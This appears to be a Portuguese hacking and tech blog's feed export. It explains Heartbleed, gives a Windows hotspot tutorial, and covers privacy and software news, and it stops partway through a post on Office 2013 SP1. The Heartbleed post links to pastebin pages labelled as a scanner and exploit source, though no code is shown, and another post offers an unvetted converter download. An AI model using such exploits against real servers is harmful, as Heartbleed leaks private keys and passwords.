tag:blogger.com,1999:blog-76699769416771732742024-03-17T17:16:41.826-07:00[HC]Host - No Caminho Certo Do Conhecimento!HC Host vem com novidades para informatica, hacking, pentest e outros gêneros que desejam obter conhecimento livre e de boa procedência e o melhor, um conhecimento confiável e de graça!HC Hosthttp://www.blogger.com/profile/07327664629783067415noreply@blogger.comBlogger710125tag:blogger.com,1999:blog-7669976941677173274.post-26344831537151574672016-02-12T10:04:00.001-08:002016-02-12T10:04:41.627-08:00Serviço de buffet na FlóridaSe você está procurando serviço de buffet na flórida, acesse: <a href="http://creationcatering.com/">http://creationcatering.com/</a>Guilhermehttp://www.blogger.com/profile/05556516340302955329noreply@blogger.com0tag:blogger.com,1999:blog-7669976941677173274.post-85719151470735233552014-06-18T06:24:00.000-07:002014-06-18T06:27:14.120-07:00O Facebook já anunciou que vai analisar o histórico dos seus usuários. Como impedir?<div class="separator" style="clear: both; text-align: center;">
<a href="https://scontent-a-atl.xx.fbcdn.net/hphotos-xap1/t31.0-8/q71/s720x720/10371262_948942661826097_3283404382872613933_o.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="313" src="https://scontent-a-atl.xx.fbcdn.net/hphotos-xap1/t31.0-8/q71/s720x720/10371262_948942661826097_3283404382872613933_o.jpg" width="640" /></a></div>
<br />
<br />
<br />
O Facebook já anunciou que vai analisar o histórico dos seus usuários, aprenda como evitar que a rede social faça isso com os seus dados.<br />
<div>
<br /></div>
<div>
<div>
A gigante de Palo Alto anunciou hoje (13), uma mudança significativa na rede social, o sistema do Facebook começará a analisar os hábitos de seus usuários mesmo quando eles não estiverem dentro da rede social. A razão para isso, é fornecer as empresas a possibilidade de exibir seus anúncios focados nos interesses recentes dos usuários.</div>
<div>
<br /></div>
<div>
O face vai ser capaz de acessar o histórico do navegador. Sendo assim quando você fizer uma busca sobre maquiagem por exemplo no Google, o Facebook vai saber que você é um potencial consumidor de maquiagem. Mesmo que você fale pouco sobre isso para os seus amigos na rede social, assim ele mostrará assuntos referentes a maquiagem, e é claro esse tipo de anúncio fará com que você compre mais. (A maquiagem é apenas um exemplo, pode ser substituído por qualquer outro tipo de produto).</div>
<div>
<br />
<b>Como fugir disso?</b></div>
<div>
Acesse o site <a href="http://www.aboutads.info/choices/" target="_blank">Digital Advertising Alliance</a>. Ele vai analisar o seu navegador e te mostrar uma lista das empresas que fazem análise dos seus dados.</div>
<div>
Na lista, basta escolher o Facebook (ou qualquer outra empresa que você não queira mais que analise sua navegação). Depois é só clicar no botão “Submit your choices” (enviar suas escolhas, em inglês).</div>
<div>
Fazendo isso, você seleciona quais serviços não deverão ter acesso a essas informações.</div>
<div>
<br />
<b>E nos celulares?</b></div>
<div>
Em dispositivos móveis, também é possível. No iOS basta entrar em “Ajustes”, em seguida “Geral”, depois “Restrições” e ir no menu “Publicidade”. É só acionar “Limitar Publicidade Rastreada”.</div>
<div>
No Android, o caminho é “Config. Google”, em seguida “Anúncios”, depois “Desativar anúncios c/ base em interesses”. Pronto. Depois disso nenhum aplicativo poderá fornecer anúncios com base na análise de navegação.<br />
<br />
<b>FONTE </b>: fatosdesconhecidos.com.br/</div>
</div>
<div>
<br /></div>
HC Hosthttp://www.blogger.com/profile/07327664629783067415noreply@blogger.com1tag:blogger.com,1999:blog-7669976941677173274.post-88946115100735241612014-06-18T06:23:00.003-07:002014-06-18T06:23:20.592-07:00Conversor de PDF para Word GRATUITO e FUNCIONAL - PORTÁTIL <div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-OOjTXJj9HWw/U6GQ3O9fPRI/AAAAAAAAAw0/--hrfhHIb4c/s1600/pdftoword.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-OOjTXJj9HWw/U6GQ3O9fPRI/AAAAAAAAAw0/--hrfhHIb4c/s1600/pdftoword.jpg" height="274" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Bom galera, foi difícil eu encontrar um conversor gratuito e portátil para que funcionasse de verdade, esse por sinal é muito bom, mantém bem a formatação do texto e imagens. Aconselho a usar sempre!<br />
<br />
<div style="text-align: center;">
TAMANHO: 5,3 Mb</div>
<div style="text-align: center;">
<a href="https://mega.co.nz/#!rloCxLBC!eotsuOGz7ftpfxKnUpr-4Oab3cjVPUye5aaFpLCkfTA" target="_blank">DOWNLOAD</a></div>
Guilhermehttp://www.blogger.com/profile/05556516340302955329noreply@blogger.com1tag:blogger.com,1999:blog-7669976941677173274.post-42898938752176172712014-05-17T06:30:00.000-07:002014-05-17T06:30:05.272-07:00Vamos falar de HEARBLEED S2<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-rlrZKeLF6Lc/U2j-KfHd2NI/AAAAAAAADDk/eEsNxOsFfq0/s1600/heartbleed.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-rlrZKeLF6Lc/U2j-KfHd2NI/AAAAAAAADDk/eEsNxOsFfq0/s1600/heartbleed.png" height="320" width="264" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Heartbleed é um bug de segurança na biblioteca OpenSSL criptografia de código aberto,</div>
<div class="separator" style="clear: both; text-align: left;">
que é amplamente utilizado para implementar o Internet Transport Layer Security (TLS) protocolo.</div>
<div class="separator" style="clear: both; text-align: left;">
Resultados Heartbleed de validação de entrada imprópria ( devido a uma limites ausentes cheque)</div>
<div class="separator" style="clear: both; text-align: left;">
na implementação do Transport Layer Security (TLS) extensão batimentos cardíacos, o coração estar por trás do nome do bug. Esta vulnerabilidade é classificada como um buffer over-read.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
"Esta falha permite que um atacante remoto recupere memória privada de um aplicativo que usa a biblioteca OpenSSL vulnerável em pedaços de 64k de cada vez."</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
A versão fixa do OpenSSL foi lançado em 07 de abril de 2014 , ao mesmo tempo que Heartbleed foi divulgada publicamente . Naquela época, cerca de 17 por cento ( cerca de meio milhão ) de servidores Web seguros da Internet certificados por autoridades confiáveis , acreditava-se ser vulnerável ao ataque , permitindo o roubo de " chaves privadas e dos usuários dos servidores de cookies de sessão e senhas.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Um dos principais objetivos dos atacantes, é obter logins e senhas de acesso a contas de e-mail, mas, não para por ai. O SSL/TLS é também responsável pela comunicação segura de e-mail, mensagem instantânea e as VPNs (Virtual Private Networks).’</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
A falha Heartbleed não encontra-se no protocolo SSL/TSL, mas sim na biblioteca OpenSSL.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Quais versões do OpenSSL são afetados?</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Estatuto dos diferentes versões:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both;">
<span style="color: red;"><b>OpenSSL 1.0.1 através 1.0.1f (inclusive) são vulneráveis </b></span></div>
<div class="separator" style="clear: both;">
<b><span style="color: lime;">OpenSSL 1.0.1g não é vulnerável </span></b></div>
<div class="separator" style="clear: both;">
<b><span style="color: lime;">OpenSSL 1.0.0 ramo não é vulnerável </span></b></div>
<div class="separator" style="clear: both;">
<b><span style="color: lime;">OpenSSL 0.9.8 ramo não é vulnerável</span></b></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
OpenSSL 1.0.1g foi liberado para resolver esta vulnerabilidade. Quaisquer chaves geradas com uma versão vulnerável do OpenSSL deve ser considerada comprometida e regenerado e implantado após o patch foi aplicado.</div>
<div class="separator" style="clear: both;">
<br /></div>
<h4 style="clear: both;">
Sistemas operacionais? </h4>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
Algumas distribuições de sistemas operacionais já fornecidos com a versão OpenSSL são potencialmente vulnerável: </div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<b><span style="color: red;">Debian Wheezy (estável), OpenSSL 1.0.1e-2 + deb7u4 </span></b></div>
<div class="separator" style="clear: both;">
<b><span style="color: red;">Ubuntu 12.04.4 LTS, OpenSSL 1.0.1-4ubuntu5.11 </span></b></div>
<div class="separator" style="clear: both;">
<b><span style="color: red;">CentOS 6.5, OpenSSL 1.0.1e-15 </span></b></div>
<div class="separator" style="clear: both;">
<b><span style="color: red;">Fedora 18, OpenSSL 1.0.1e-4 </span></b></div>
<div class="separator" style="clear: both;">
<b><span style="color: red;">OpenBSD 5.3 (OpenSSL 1.0.1c 10 de maio de 2012) e 5,4 (OpenSSL 1.0.1c 10 de maio de 2012) </span></b></div>
<div class="separator" style="clear: both;">
<b><span style="color: red;">FreeBSD 10.0 - 1.0.1e OpenSSL 11 fev 2013 </span></b></div>
<div class="separator" style="clear: both;">
<b><span style="color: red;">NetBSD 5.0.2 (OpenSSL 1.0.1e) </span></b></div>
<div class="separator" style="clear: both;">
<b><span style="color: red;">OpenSUSE 12.2 (OpenSSL 1.0.1c) </span></b></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
Distribuição do sistema operacional com as versões que não são vulneráveis: </div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<span style="color: lime;"><b>Debian Squeeze (oldstable), OpenSSL 0.9.8o-4squeeze14 </b></span></div>
<div class="separator" style="clear: both;">
<span style="color: lime;"><b>SUSE Linux Enterprise Server </b></span></div>
<div class="separator" style="clear: both;">
<span style="color: lime;"><b>FreeBSD 8.4 - 0.9.8y OpenSSL 05 de fevereiro de 2013 </b></span></div>
<div class="separator" style="clear: both;">
<span style="color: lime;"><b>FreeBSD 9.2 - 0.9.8y OpenSSL 05 de fevereiro de 2013 </b></span></div>
<div class="separator" style="clear: both;">
<span style="color: lime;"><b>FreeBSD 10.0p1 - 1.0.1g OpenSSL (Na 08 abril 2014 18:27:46 UTC) </b></span></div>
<div class="separator" style="clear: both;">
<span style="color: lime;"><b>FreeBSD - 1.0.1g OpenSSL (Pelo 7 abr 2014 21:46:40 UTC)</b></span></div>
<div>
<br /></div>
<div style="text-align: left;">
Entenda :</div>
<br />
<iframe allowfullscreen="" frameborder="0" height="400" mozallowfullscreen="" src="//player.vimeo.com/video/91425662?title=0&byline=0&portrait=0" webkitallowfullscreen="" width="600"></iframe> <a href="http://vimeo.com/91425662"></a>.<br />
<br />
<b>SCAN + EXPLOIT Heartbleed OpenSSL</b><br />
http://pastebin.com/nfr3ivGk<br />
<br />
<br />
<b>SOURCE EXPLOIT - Heartbleed</b><br />
http://pastebin.com/vznDZDS0<br />
<br />
REF:<br />
http://blog.inurl.com.br/2014/05/vamos-falar-de-hearbleed-s2.html<br />
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160<br />
https://en.wikipedia.org/wiki/Heartbleed<br />
https://www.openssl.org/news/secadv_20140407.txt<br />
http://heartbleed.com/HC Hosthttp://www.blogger.com/profile/07327664629783067415noreply@blogger.com0tag:blogger.com,1999:blog-7669976941677173274.post-14485652136291535132014-05-10T19:41:00.000-07:002014-05-10T19:41:06.534-07:00Substitua roteador Wi-Fi usando um notebook <div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img1.olhardigital.uol.com.br/area_logada/imagem.php?id=538728" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://img1.olhardigital.uol.com.br/area_logada/imagem.php?id=538728" height="254" width="400" /></a></div>
É sempre bom dar alguma utilização ao que já está velho e largado em casa. Hoje, por exemplo, vamos ensinar como fazer daquele notebook gasto - com idade entre 7-8 anos - uma estação de distribuição de internet Wi-Fi, dispensando o roteador.<br />
<br />
Antes, é importante dizer que o método apresentado abaixo só funciona com uma placa Wi-Fi compatível, que dê conta do recado. Melhor ainda se a máquina tiver sido recém-formatada.<br />
<br />
Para este guia vamos utilizar o Windows 7, que não é tão pesado quanto o Windows 8, e é mais seguro do que o Windows XP, cujo suporte foi encerrado no mês passado pela Microsoft (e não deveria ser utilizado para entrar na internet de jeito nenhum).<br />
<br />
Mãos à obra!<br />
<br />
<b>1) Conecte seu laptop ao modem, com um cabo Ethernet.</b><br />
<br />
O modem de sua operadora de internet com certeza tem um cabo ethernet saindo dele (provavelmente azul). Conecte o computador à internet por meio desse cabo (não pelo Wi-Fi, isso é importante). Este é o lugar onde ele vai ficar, funcionando como roteador.<br />
<b><br /></b>
<b>2) Crie um ponto de acesso</b><br />
<br />
Esta é a principal parte. No menu iniciar digite "cmd" e, ao aparecer o arquivo "cmd.exe", clique com o botão direito nele e o execute como administrador.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img1.olhardigital.uol.com.br/uploads/acervo_imagens/2014/05/20140507104653.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://img1.olhardigital.uol.com.br/uploads/acervo_imagens/2014/05/20140507104653.jpg" /></a></div>
<br />
No prompt de comando, digite o seguinte:<br />
<br />
<b>netsh wlan set hostednetwork mode=allow ssid=NOMEDAREDE key=SENHADAREDE keyUsage=persistent</b><br />
<br />
<br />
No comando digitado, você deve trocar NOMEDAREDE e SENHADAREDE pelo nome e senha que você quer que sejam utilizados por sua nova rede Wi-Fi. Se tudo correr bem, três mensagens aparecerão. Veja nosso exemplo abaixo, em que utilizamos uma rede chamada "compartilha" e uma senha "senhadeteste".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img1.olhardigital.uol.com.br/uploads/acervo_imagens/2014/05/20140507105020.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://img1.olhardigital.uol.com.br/uploads/acervo_imagens/2014/05/20140507105020.jpg" /></a></div>
<br />
Prontinho, a rede está criada, mas ainda faltam algumas configurações para que você possa usá-la.<br />
<br />
<b>3) Inicie sua rede Wi-Fi</b><br />
<br />
Apenas um comando é responsável por ligar a rede que você acabou de criar. Basta digitar o seguinte, no mesmo prompt:<br />
<b><br /></b>
<b>netsh wlan start hostednetwork</b><br />
<b><br /></b>
Isso, avançamos mais um pouco. Agora sua rede está iniciada e poderá ser encontrada por outros computadores, celulares e tablets, mas falta um último detalhe: ela não compartilha a internet neste modo. É preciso um passo simples para corrigir o problema.<br />
<b><br /></b>
<b>4) Compartilhe a internet</b><br />
<br />
<br />
Faça com que seu computador envie a internet compartilhada para todos os outros dispositivos: abra o "Painel de Controle", vá à "Central de compartilhamento de rede" e clique em "Alterar as configurações do adaptador".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img1.olhardigital.uol.com.br/uploads/acervo_imagens/2014/05/20140507105755.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://img1.olhardigital.uol.com.br/uploads/acervo_imagens/2014/05/20140507105755.jpg" /></a></div>
<br />
Será aberta uma tela com suas conexões. Note que a conexão wireless mais recente deve ser o ponto de acesso que você criou com este tutorial (ela deve estar com o nome de dispositivo "Microsoft Virtual WiFi MiniPort Adapter"). Na figura abaixo, estão sendo mostradas a conexão local (via cabo, diretamente ligada ao modem), a conexão wireless 1 (usada para se conectar ao roteador comum, que está desligado para este guia) e a conexão wireless 2, a "compartilha", que criamos agora há pouco.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img1.olhardigital.uol.com.br/uploads/acervo_imagens/2014/05/20140507110003.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://img1.olhardigital.uol.com.br/uploads/acervo_imagens/2014/05/20140507110003.jpg" /></a></div>
<br />
Clique com o botão direito em sua rede local <b>COM FIO</b> (lembre-se, seu computador recebe a internet pela rede <b>COM FIO</b>, e a compartilha pela rede <b>SEM FIO</b>), escolha "propriedades" e, na tela que abrir, Vá para a aba "Compartilhamento".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img1.olhardigital.uol.com.br/uploads/acervo_imagens/2014/05/20140507110131.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://img1.olhardigital.uol.com.br/uploads/acervo_imagens/2014/05/20140507110131.jpg" /></a></div>
<br />
Marque a primeira opção e escolha por qual conexão Wi-Fi irá compartilhar (em nosso caso, a Wireless Connection 2).<br />
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img1.olhardigital.uol.com.br/uploads/acervo_imagens/2014/05/20140507110413.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://img1.olhardigital.uol.com.br/uploads/acervo_imagens/2014/05/20140507110413.jpg" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
Dê "OK" e pronto, tudo estará resolvido.</div>
<div>
<br /></div>
<div>
<div>
Observações:</div>
<div>
<br /></div>
<div>
O processo foi testado em uma conexão residencial comum, desligando o roteador da tomada e substituindo por um notebook. A conexão funcionou normalmente com outros computadores rodando Windows 7, celulares Android e iPad.</div>
</div>
<div>
<br /></div>
<div>
<b>FONTE :</b> http://olhardigital.uol.com.br/</div>
HC Hosthttp://www.blogger.com/profile/07327664629783067415noreply@blogger.com1tag:blogger.com,1999:blog-7669976941677173274.post-11628613535527445312014-04-04T14:40:00.000-07:002014-04-04T14:40:47.218-07:00Criador de Expressões Regulares<br />
Uma das coisas mais chatas quando vamos criar ER's é ter que ficar testando se vai funcionar ou não, teu problema já era! Bastando usar o <a href="http://regexr.com/" target="_blank"><span style="color: #66ccff; font-family: Cabin, sans-serif; font-size: 1.25rem;">RegExr</span><span style="color: #80808f; font-family: Cabin, sans-serif; font-size: 12px;">v2.0 </span></a> que você saberá em tempo real se sua ER está com a estrutura correta e se está filtrando bem os resultados! Fique á vontade, basta clicar no nome dele para acessar!Guilhermehttp://www.blogger.com/profile/05556516340302955329noreply@blogger.com0tag:blogger.com,1999:blog-7669976941677173274.post-85650316093040347842014-03-11T05:28:00.000-07:002014-03-11T05:29:41.024-07:00Snowden: "A NSA está colocando fogo no futuro da Internet"<div class="separator" style="clear: both; text-align: center;">
<a href="http://guardianlv.com/wp-content/uploads/2013/12/edwardCIA-NSA-Edward-Snowden_1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://guardianlv.com/wp-content/uploads/2013/12/edwardCIA-NSA-Edward-Snowden_1.jpg" height="356" width="640" /></a></div>
<br />
<br />
Edward Snowden, o ex-analista da CIA que ficou conhecido por revelar o escândalo massivo de espionagem do governo americano, fez nesta segunda-feira, 10, sua primeira aparição pública ao vivo para o público dos Estados Unidos, via Google Hangouts. A apresentação aconteceu durante o SXSW, que acontece em Austin.<br />
<br />
Durante o evento, Snowden voltou a ressaltar a importância do respeito aos direitos da privacidade na internet. Para isso, ele defende que não apenas os governos deixem de espionar, mas que haja um investimento maior de empresas e desenvolvedores em criptografia.<br />
<br />
Nos últimos meses, muitas informações apontavam para um rumor de que o governo americano, por meio da NSA (Agência Nacional de Segurança), seria capaz de quebrar a maioria dos tipos de criptografia existentes. Snowden, no entanto, não crê que isso esteja acontecendo de fato.<br />
<br />
Para reafirmar sua posição sobre encriptação, ele diz que até agora o governo dos Estados Unidos não sabem quais documentos sigilosos foram vazados para jornalistas. "Eles não sabem o que foi repassado porque criptografia funciona. Precisamos pensar nela não como uma arte das trevas, mas como uma proteção contra as artes das trevas", afirmou ele.<br />
<br />
Ele rejeita a ideia de que a NSA possua um sistema superpoderoso, capaz de quebrar qualquer tipo de criptografia. Na verdade, o que ele acha mais perigoso e mais próximo da realidade, é que o governo americano simplesmente rouba as chaves de encriptação.<br />
<br />
"Eu acho que a criptografia irá se manter, a menos que tenhamos saltos massivos no entendimento de matemática e física", afirmou ele.<br />
<br />
Por fim, ele voltou a atacar as práticas da NSA, afirmando que eles estão "colocando fogo no futuro da Internet", e as pessoas que assistiam as transmissões são "os bombeiros". "Precisamos de sua ajuda para corrigir isso".<br />
<br />
Ele também reafirmou que não se arrepende do que fez, mesmo depois de ser praticamente expulso do seu país. "Independente do que acontecer comigo. Isso é algo a que nós temos direito. Eu jurei apoiar e defender a Constituição (dos Estados Unidos) e eu a vi sendo violada em escala massiva", disse, sem mostrar nenhum arrependimento com sua situação.<br />
<br />
Quem quiser assistir ao vídeo na íntegra pode conferir abaixo (em inglês, com problemas no áudio):<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<h1 class="yt" id="watch-headline-title" style="border: 0px; margin: 0px 0px 5px; overflow: hidden; padding: 0px; text-overflow: ellipsis; word-wrap: normal;">
<span style="font-family: arial, sans-serif; font-size: large;"><span style="font-weight: normal; white-space: nowrap;"><iframe allowfullscreen="" frameborder="0" height="315" src="//www.youtube.com/embed/CPrDqoaHHSY" width="560"></iframe></span></span></h1>
<div>
<span style="font-family: arial, sans-serif; font-size: large;"><span style="font-weight: normal; white-space: nowrap;"><br /></span></span></div>
<div>
<span style="font-family: arial, sans-serif;"><span style="white-space: nowrap;"><b>FONTE : </b></span><span style="white-space: nowrap;">olhardigital.uol.com.br/</span></span></div>
HC Hosthttp://www.blogger.com/profile/07327664629783067415noreply@blogger.com0tag:blogger.com,1999:blog-7669976941677173274.post-53652372255066916282014-03-08T06:55:00.003-08:002014-03-08T06:55:47.142-08:00Confira 7 softwares para acelerar seu PC<div class="separator" style="clear: both; text-align: center;">
<a href="http://wallpaper.free-photograph.net/mid/yun_334.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://wallpaper.free-photograph.net/mid/yun_334.jpg" height="400" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
O HD (disco rígido do computador) armazena diariamente uma grande quantidade de arquivos com informações de sistema, cookies de navegação, registros de programas instalados, dados de backup, entre outros. Com o passar do tempo, o sistema operacional pode ficar lento devido ao acúmulo de dados e o PC passa a demorar para iniciar e carregar os programas.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Para resolver o problema e turbinar a máquina, existem aplicativos que fazem uma verdadeira limpeza no sistema, identificando informações inúteis que podem comprometer seu desempenho e aumentando a memória disponível. Confira abaixo alguns dos softwares mais populares, todos eles disponíveis para download nos links.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="http://olhardigital.uol.com.br/download/28112/28112?oid=1" target="_blank">CCleaner</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
O programa é um dos líderes da categoria. Fácil de usar, ele apresenta ao usuário uma lista com todos os softwares que podem ser apagados. É possível escolher aqueles que deseja eliminar e, após a tarefa, o CCleaner informa o motivo da eliminação de registros.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="http://olhardigital.uol.com.br/download/40545/40545?oid=1" target="_blank">Advanced SystemCare 7</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
O limpador divide suas funções em três itens que permitem focar as tarefas em áreas do PC. A função “Turbo Boost” finaliza atividades desnecessárias que ficam em segundo plano enquanto jogos ou vídeos sejam reproduzidos. Ele traz também recursos que identificam e eliminam malwares.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="http://olhardigital.uol.com.br/download/40546/40546?oid=1" target="_blank">Memory Cleaner</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
O diferencial desse aplicativo é a simplicidade. Trabalhando especificamente com a memória RAM, ele exibe na tela inicial gráficos com a porcentagem do consumo atual da memória e sua quantidade livre. São apenas dois botões: “Trim Processes’ Working Set”, que apaga a memória desnecessária, e “Clear System Cache”, que dá fim à memória cache do sistema.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="http://olhardigital.uol.com.br/download/40549/40549?oid=1" target="_blank"> Jet Clean</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
O Jet Clean traz cinco opções de limpeza: registros, pastas do Windows, aplicativos, atalhos e memória RAM. Ele também desinstala completamente aplicativos e pode desfragmentar o disco rígido. É possível agendar datas e horários para limpezas.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="http://olhardigital.uol.com.br/download/40556/40556?oid=1" target="_blank">TuneUp Utilities</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
O programa oferece 35 recursos de manutenção do Windows, ajusta as configurações do PC e elimina arquivos duplicados na memória. Para notebooks, a desenvolvedora promete prolongar a vida útil das baterias. O aplicativo é grátis para testes durante 15 dias.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="http://olhardigital.uol.com.br/download/40553/40553?oid=1" target="_blank">Wise Memory Optimizer</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
O utilitário tem foco na memória RAM, e a utilização não exige a instalação. Para limpar os itens desnecessários, basta clicar em “Optimize Now” ou, se preferir, dá para rodar o programa diretamente da área de notificação.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="http://olhardigital.uol.com.br/download/40637/40637?oid=1" target="_blank"> PrivaZer</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
O PrivaZer oferece duas opções de limpeza: simples e completa. Para acelerar a varredura e diminuir o tempo de espera, selecione a função “Impulsionar”. É possível agendar o desligamento do computador depois do fim da tarefa. O aplicativo não realiza a desfragmentação de HD.</div>
<br />
<b>FONTE : </b>olhardigital.uol.com.br/HC Hosthttp://www.blogger.com/profile/07327664629783067415noreply@blogger.com0tag:blogger.com,1999:blog-7669976941677173274.post-81771240760427931772014-02-26T08:02:00.001-08:002014-02-26T08:02:51.363-08:00Microsoft Office 2013 Service Pack 1 (SP1) Liberado<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-gdkmihaSrzM/Uw4QDOgmdmI/AAAAAAAAAoE/1uG82s19bQA/s1600/Capturar.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-gdkmihaSrzM/Uw4QDOgmdmI/AAAAAAAAAoE/1uG82s19bQA/s1600/Capturar.JPG" /></a></div>
<div style="background-color: white; color: #333333; font-family: 'Segoe UI', Arial, Helvetica, sans-serif; font-size: 14px; line-height: 22.399999618530273px; margin-bottom: 15px; padding: 0px;">
<span style="margin: 0px; padding: 0px;"><br /></span></div>
<div style="background-color: white; color: #333333; font-family: 'Segoe UI', Arial, Helvetica, sans-serif; font-size: 14px; line-height: 22.399999618530273px; margin-bottom: 15px; padding: 0px;">
<span style="margin: 0px; padding: 0px;">Boas notícias para</span><span style="margin: 0px; padding: 0px;"><span style="margin: 0px; padding: 0px;"> usuários do Office 2013. </span><span style="margin: 0px; padding: 0px;">A Microsoft lançou o primeiro </span></span><strong style="margin: 0px; padding: 0px;">"SP1" Service Pack </strong><span style="margin: 0px; padding: 0px;">para o Office 2013 suite.</span></div>
<div style="background-color: white; color: #333333; font-family: 'Segoe UI', Arial, Helvetica, sans-serif; font-size: 14px; line-height: 22.399999618530273px; margin-bottom: 15px; padding: 0px;">
<span style="margin: 0px; padding: 0px;"><span style="margin: 0px; padding: 0px;">O SP1 para o Office 2013 vem com novas atualizações para melhorar a segurança, desempenho e estabilidade dos programas. </span><span style="margin: 0px; padding: 0px;">Este service pack já contém todas as atualizações lançadas anteriormente para o Office 2013 suite.</span></span></div>
<div style="background-color: white; color: #333333; font-family: 'Segoe UI', Arial, Helvetica, sans-serif; font-size: 14px; line-height: 22.399999618530273px; margin-bottom: 15px; padding: 0px;">
<span style="margin: 0px; padding: 0px;">Lista de melhorias por SP1 que valem a pena mencionar:</span></div>
<ul style="background-color: white; color: #333333; font-family: 'Segoe UI', Arial, Helvetica, sans-serif; font-size: 14px; list-style-image: url(http://media.askvg.com/images/b.png); margin: 0px; padding: 2px 0px 2px 15px;">
<li style="margin: 0px 0px 15px; padding: 0px;"><span style="margin: 0px; padding: 0px;">Melhora a compatibilidade com </span><span style="margin: 0px; padding: 0px; text-decoration: underline;"><a href="http://www.askvg.com/exclusive-windows-8-1-features-list/" style="color: #004276; margin: 0px; padding: 0px; text-decoration: none;">o Windows 8.1</a></span><span style="margin: 0px; padding: 0px;"> .</span></li>
<li style="margin: 0px 0px 15px; padding: 0px;"><span style="margin: 0px; padding: 0px;">Melhora a compatibilidade com </span><span style="margin: 0px; padding: 0px; text-decoration: underline;"><a href="http://www.askvg.com/ie11-review-list-of-features-that-have-been-removed-or-added-in-internet-explorer-11/" style="color: #004276; margin: 0px; padding: 0px; text-decoration: none;">o Internet Explorer 11</a></span><span style="margin: 0px; padding: 0px;"> .</span></li>
<li style="margin: 0px 0px 15px; padding: 0px;"><span style="margin: 0px; padding: 0px;">Melhora a compatibilidade com hardware moderno.</span></li>
